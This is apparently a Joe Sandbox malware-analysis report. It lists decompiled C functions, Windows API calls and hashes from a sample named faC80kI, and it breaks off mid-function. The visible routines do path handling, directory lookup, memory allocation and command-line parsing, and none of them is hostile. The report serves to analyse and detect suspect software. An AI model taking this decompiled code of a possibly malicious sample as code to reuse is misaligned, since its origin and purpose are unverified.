                                                                                                                                                                                                                                            0x00a94ae9
                                                                                                                                                                                                                                            0x00a94aed
                                                                                                                                                                                                                                            0x00a94aed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A93680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A9369F
                                                                                                                                                                                                                                              • Part of subcall function 00A93680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936B2
                                                                                                                                                                                                                                              • Part of subcall function 00A93680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A94B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: cabd5539252d18265baf707039a089862e4ec9785116a741bce7e073265a8f9d
                                                                                                                                                                                                                                            • Instruction ID: 78e1f8e8d42108229a17b37f327fcca7a6a76e209e45bfdca1810a4c7d2c62f4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cabd5539252d18265baf707039a089862e4ec9785116a741bce7e073265a8f9d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4012931300215ABEB15CFA8DC45FA677A9AB49725F14822AE9399A1E0CF70D813CB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A9658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0xa98b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0xa98b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E00A916B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a96592
                                                                                                                                                                                                                                            0x00a96594
                                                                                                                                                                                                                                            0x00a96596
                                                                                                                                                                                                                                            0x00a96598
                                                                                                                                                                                                                                            0x00a96598
                                                                                                                                                                                                                                            0x00a9659b
                                                                                                                                                                                                                                            0x00a9659b
                                                                                                                                                                                                                                            0x00a9659d
                                                                                                                                                                                                                                            0x00a9659e
                                                                                                                                                                                                                                            0x00a965a2
                                                                                                                                                                                                                                            0x00a965a4
                                                                                                                                                                                                                                            0x00a965a9
                                                                                                                                                                                                                                            0x00a965b2
                                                                                                                                                                                                                                            0x00a965b6
                                                                                                                                                                                                                                            0x00a965ba
                                                                                                                                                                                                                                            0x00a965c3
                                                                                                                                                                                                                                            0x00a965c5
                                                                                                                                                                                                                                            0x00a965c8
                                                                                                                                                                                                                                            0x00a965c8
                                                                                                                                                                                                                                            0x00a965c3
                                                                                                                                                                                                                                            0x00a965c9
                                                                                                                                                                                                                                            0x00a965cc
                                                                                                                                                                                                                                            0x00a965d2
                                                                                                                                                                                                                                            0x00a965d1
                                                                                                                                                                                                                                            0x00a965d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a965dc
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A98B3E,00A98B3F,00000001,00A98B3E,-00000003,?,00A960EC,00A91140,?), ref: 00A965BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: a37e989459da95628cfd54a614f1b2c4dbd4a5e98963cd4bd77aa346ba79f88d
                                                                                                                                                                                                                                            • Instruction ID: cd0a7ed1c148a366d4e80bacd6dfe7f830657b88b4be3ebf645845e57ed672be
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a37e989459da95628cfd54a614f1b2c4dbd4a5e98963cd4bd77aa346ba79f88d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21F04C327042509BDB324A1D9884B66BFDE9F86350F2A016FE8DEC3209CA658C46C3A4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A9621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E00A9597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a96229
                                                                                                                                                                                                                                            0x00a96230
                                                                                                                                                                                                                                            0x00a96247
                                                                                                                                                                                                                                            0x00a9626a
                                                                                                                                                                                                                                            0x00a96272
                                                                                                                                                                                                                                            0x00a96249
                                                                                                                                                                                                                                            0x00a96255
                                                                                                                                                                                                                                            0x00a9625f
                                                                                                                                                                                                                                            0x00a96264
                                                                                                                                                                                                                                            0x00a96264
                                                                                                                                                                                                                                            0x00a96284

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A9623F
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                              • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: 58e9436a5ee27d1ed73826b12b4dc4e8a8672b1dfc407b54e635b6e6adb99092
                                                                                                                                                                                                                                            • Instruction ID: f1e592e0f60cdcd737c465d4f1dd8601b2a7d7480960690f837bbe13b8d06b0e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58e9436a5ee27d1ed73826b12b4dc4e8a8672b1dfc407b54e635b6e6adb99092
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDF0B4B0B002086BEF50EB748E02FFE32F8DB94300F40006AB986D6081ED749D458650
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A94B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0xa98d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0xa98d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0xa98d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa98d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa98d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa98d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa98d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00a94b66
                                                                                                                                                                                                                                            0x00a94b74
                                                                                                                                                                                                                                            0x00a94b98
                                                                                                                                                                                                                                            0x00a94ba0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94bac
                                                                                                                                                                                                                                            0x00a94ba4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94ba4
                                                                                                                                                                                                                                            0x00a94b78
                                                                                                                                                                                                                                            0x00a94b7e
                                                                                                                                                                                                                                            0x00a94b84
                                                                                                                                                                                                                                            0x00a94b8a
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A94FA1,00000000), ref: 00A94B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: 9842d290ebcc87940d430a15d3c55379d31849ca4e9d8be37c1feb60278b1272
                                                                                                                                                                                                                                            • Instruction ID: 3ee9df78f49577059d7e9611a2cc66e57ed969317c33cc20ff95c75869793e47
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9842d290ebcc87940d430a15d3c55379d31849ca4e9d8be37c1feb60278b1272
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DF01271700B089E5F71CF39CC01A52BBE4AAA6360310092F956ED2190DB35A44ACBD0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A966AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a966b1
                                                                                                                                                                                                                                            0x00a966ba
                                                                                                                                                                                                                                            0x00a966c7
                                                                                                                                                                                                                                            0x00a966bc
                                                                                                                                                                                                                                            0x00a966be
                                                                                                                                                                                                                                            0x00a966be

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,00A94777,?,00A94E38,?), ref: 00A966B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            • Opcode ID: 834417ffd6525188688ea2ae6dda068b8c3ef242674accaecba9e5d26fad080e
                                                                                                                                                                                                                                            • Instruction ID: bfeabb89283b6c297189877ecd2c07c7550803149c0ab08b11cf6e63ad53e414
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 834417ffd6525188688ea2ae6dda068b8c3ef242674accaecba9e5d26fad080e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61B09276726440426E2447756C295562981AAD123A7E41B92F132C01E0CE3EC856D044
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A94CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a94caa
                                                                                                                                                                                                                                            0x00a94cb1

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A94CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            • Opcode ID: b8a24ac996e79dcd53a972b50cbc5519acf05a227e24810147512d053866c831
                                                                                                                                                                                                                                            • Instruction ID: d253eca198073c457fb0d2a258c916e7be4b53d557c0d4da7e4801c865e70d32
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8a24ac996e79dcd53a972b50cbc5519acf05a227e24810147512d053866c831
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11B0123214420CB7CF001FC6EC09F853F1DE7C4761F140002F60C494508E73942186D6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A94CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a94cc8
                                                                                                                                                                                                                                            0x00a94ccf

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            • Opcode ID: f6cd5e18bcaf910a2e124c54629a74946686fb9f18db4a15ef79c46045144a35
                                                                                                                                                                                                                                            • Instruction ID: eafdc185d21a0f7425aa8a149d23bc41e0a53b1bc036dcd617b17517e00c319e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6cd5e18bcaf910a2e124c54629a74946686fb9f18db4a15ef79c46045144a35
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69B0123100010CB78F001B86EC088453F1DD6C02607000012F50C454218F33981285C5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A95C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                            				CHAR* _t201;
                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                            				int _t209;
                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                            				CHAR* _t218;
                                                                                                                                                                                                                                            				intOrPtr* _t219;
                                                                                                                                                                                                                                            				intOrPtr* _t220;
                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                            				signed int _t223;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t173 = __ecx;
                                                                                                                                                                                                                                            				_t61 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                            				_t209 = 1;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					while(_t209 != 0) {
                                                                                                                                                                                                                                            						_t67 =  *_t173;
                                                                                                                                                                                                                                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                            							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v272 = _t173;
                                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t69 = _v272;
                                                                                                                                                                                                                                            							_t177 = 0;
                                                                                                                                                                                                                                            							_t213 = 0;
                                                                                                                                                                                                                                            							_t163 = 0;
                                                                                                                                                                                                                                            							_t202 = 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								if(_t213 != 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L21;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t69 =  *_t69;
                                                                                                                                                                                                                                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t69 = _v272;
                                                                                                                                                                                                                                            										L21:
                                                                                                                                                                                                                                            										_t155 =  *_t69;
                                                                                                                                                                                                                                            										if(_t155 != 0x22) {
                                                                                                                                                                                                                                            											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            												goto L106;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                            												_t177 = _t177 + 1;
                                                                                                                                                                                                                                            												_t202 = _t202 + 1;
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                            												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            													L106:
                                                                                                                                                                                                                                            													_t63 = 0;
                                                                                                                                                                                                                                            													L125:
                                                                                                                                                                                                                                            													_pop(_t210);
                                                                                                                                                                                                                                            													_pop(_t212);
                                                                                                                                                                                                                                            													_pop(_t162);
                                                                                                                                                                                                                                            													return E00A96CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                            												} else {
